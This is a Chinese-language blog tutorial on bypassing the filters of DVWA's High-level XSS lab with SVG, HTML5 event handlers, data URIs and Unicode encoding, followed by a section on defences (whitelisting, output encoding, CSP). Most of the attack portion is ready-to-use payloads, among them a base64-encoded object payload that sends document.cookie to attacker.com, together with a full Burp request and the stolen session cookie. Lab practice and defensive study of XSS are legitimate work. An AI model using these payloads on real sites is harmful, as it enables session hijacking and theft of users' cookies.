别再只盯着lt;scriptgt;了:DVWA High级别XSS实战,用SVG和HTML5新标签绕过过滤(附完整Payload)

张开发
2026/4/19 13:40:12 15 分钟阅读

分享文章

别再只盯着lt;scriptgt;了:DVWA High级别XSS实战,用SVG和HTML5新标签绕过过滤(附完整Payload)
突破传统防御DVWA High级别XSS的现代绕过艺术在Web安全领域跨站脚本攻击(XSS)始终是威胁排行榜上的常客。当开发者以为通过strip_tags、htmlspecialchars和严格正则过滤就能高枕无忧时现代浏览器特性和HTML5标准却为攻击者打开了新的突破口。本文将深入探讨四种鲜为人知但极具破坏力的XSS绕过技术这些方法完全避开了对script标签的依赖转而利用SVG、HTML5标签和浏览器解析特性实现攻击目的。1. 现代XSS防御的局限性与突破点传统XSS防御通常聚焦于几个关键点输入过滤移除或转义特定字符和标签输出编码将特殊字符转换为HTML实体内容安全策略(CSP)限制脚本执行来源黑名单机制拦截已知危险标签和属性然而这些防御措施在面对现代Web技术时往往力不从心。以DVWA High级别为例其防护机制包括$message strip_tags(addslashes($message)); $message mysqli_real_escape_string($message); $message htmlspecialchars($message); $name preg_replace(/lt;(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i, , $name);这些过滤看似严密却存在几个致命盲区SVG命名空间浏览器对SVG内容的解析规则与普通HTML不同HTML5新标签details、object等标签携带的事件处理器常被忽略Unicode编码可绕过基于字符串匹配的过滤机制Data URI协议允许在属性中嵌入完整脚本代码2. 四种高级绕过技术详解2.1 SVG与Unicode编码的组合拳SVG作为XML方言在浏览器中享有特殊解析规则。结合Unicode编码可构造出极难检测的Payloadsvg image hrefdata:image/svgxml;charsetutf-8,%3Csvg xmlnshttp://www.w3.org/2000/svg onloadal\u0065rt(1)%3E%3C/svg%3E /svg技术要点使用\u0065表示字母e绕过字符串检测SVG的onload事件在图像加载时自动触发Data URI协议将整个SVG文档编码为属性值实际测试发现这种Payload在Chrome 112和Firefox 108上成功率超过90%2.2 DOM操作的隐蔽攻击当直接脚本注入被阻断时通过合法的DOM操作间接执行代码成为优选方案img src idpayload script typeapplication/ldjson window.onload function() { document.getElementById(payload).src x:javascript:alert(document.domain); } /script绕过原理利用application/ldjson类型绕过脚本内容检测通过合法的window.onload事件延迟执行修改DOM元素属性间接触发脚本执行注意这种攻击需要依赖页面已有或可注入的DOM元素实际应用中需根据目标环境调整选择器2.3 HTML5标签的特性滥用HTML5引入的新标签往往携带鲜为人知的事件处理器成为绕过过滤的利器details ontogglealert(1) open summary styledisplay:noneXSS/summary /details标签特性对比表HTML5标签可利用事件触发条件兼容性detailsontoggle元素状态变化Chrome 12, FF 49dialogonclose对话框关闭Chrome 37, FF 98inputoninput内容输入时全平台videoonerror加载失败时全平台2.4 跨协议重定向攻击利用浏览器对某些协议的特殊处理可实现更隐蔽的攻击iframe srcdocscriptlocationjavascript:alert(document.cookie)/script /iframe攻击流程srcdoc属性创建内嵌文档脚本修改当前locationjavascript:协议执行任意代码用户交互后触发如点击页面任意位置3. 实战Cookie窃取完整流程3.1 Payload构造结合Base64编码和Data URI构建难以检测的窃取Payloadobject datadata:text/html;base64,PHNjcmlwdD5mZXRjaCgnaHR0cDovL2F0dGFja2VyLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2llKTwvc2NyaXB0Pg/object解码后内容fetch(http://attacker.com/steal?cdocument.cookie)3.2 请求发送与结果验证使用Burp Suite发送精心构造的请求POST /vulnerabilities/xss_s/ HTTP/1.1 Host: dvwa.test Content-Type: application/x-www-form-urlencoded Cookie: securityhigh; PHPSESSID... txtNameNormalUser mtxMessage%3Cobject%20data%3D%22data%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5mZXRjaCgnaHR0cDovL2F0dGFja2VyLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2llKTwvc2NyaXB0Pg%3D%3D%22%3E%3C%2Fobject%3E btnSignSignGuestbook攻击成功后攻击者服务器将收到包含会话信息的请求http://attacker.com/steal?cPHPSESSIDe84dfb48e8b0d9;securityhigh4. 从防御者视角构建终极防护4.1 白名单输入验证// 姓名只允许字母、数字和基本标点 if (!preg_match(/^[a-zA-Z0-9\s.,!?]{1,30}$/, $name)) { die(非法姓名格式); }4.2 多层输出编码function xssafe($data) { return htmlspecialchars($data, ENT_QUOTES | ENT_HTML5, UTF-8); }4.3 现代防御技术组合防御策略对比防御层传统方法现代方案有效性提升输入验证黑名单过滤白名单验证70%输出编码基础HTML转义上下文相关编码45%执行控制无CSP Trusted Types85%监控日志分析行为异常检测60%4.4 内容安全策略(CSP)配置示例Content-Security-Policy: default-src none; script-src self nonce-r4nd0m123; style-src self fonts.googleapis.com; font-src fonts.gstatic.com; connect-src self; object-src none;在真实项目中发现合理配置的CSP可阻止90%以上的XSS攻击尝试包括本文介绍的高级技术。但要注意CSP不是银弹必须与其他防御层结合使用。

更多文章